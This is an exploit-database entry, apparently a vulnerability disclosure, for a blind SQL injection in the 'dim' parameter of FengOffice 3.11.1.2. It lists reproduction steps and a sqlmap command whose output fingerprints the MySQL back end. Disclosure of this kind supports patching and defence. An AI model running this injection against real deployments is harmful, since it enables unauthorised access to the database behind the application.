Lucene search

K
packetstormAndrey StoykovPACKETSTORM:178994
HistoryJun 10, 2024 - 12:00 a.m.

FengOffice 3.11.1.2 SQL Injection

2024-06-1000:00:00
Andrey Stoykov
packetstormsecurity.com
73
blind sql injection
fengoffice
ubuntu 22.04
sqlmap
mysql

7.4 High

AI Score

Confidence

Low

`# Exploit Title: FengOffice - Blind SQL Injection  
# Date: 06/2024  
# Exploit Author: Andrey Stoykov  
# Version: 3.11.1.2  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/05/friday-fun-pentest-series-6.html  
  
Steps to Reproduce:  
  
  
1. Login to application  
2. Click on "Workspaces"  
3. Copy full URL  
4. Paste the HTTP GET request into text file  
5. Set the injection point to be in the "dim" parameter value  
6. Use SQLMap to automate the process  
  
  
sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=mysql -p dim  
--fingerprint  
  
[...]  
[12:13:03] [INFO] confirming MySQL  
[12:13:04] [INFO] the back-end DBMS is MySQL  
[12:13:04] [INFO] actively fingerprinting MySQL  
[12:13:05] [INFO] executing MySQL comment injection fingerprint  
web application technology: Apache  
back-end DBMS: active fingerprint: MySQL >= 5.7  
comment injection fingerprint: MySQL 5.7.37  
[...]  
  
`

7.4 High

AI Score

Confidence

Low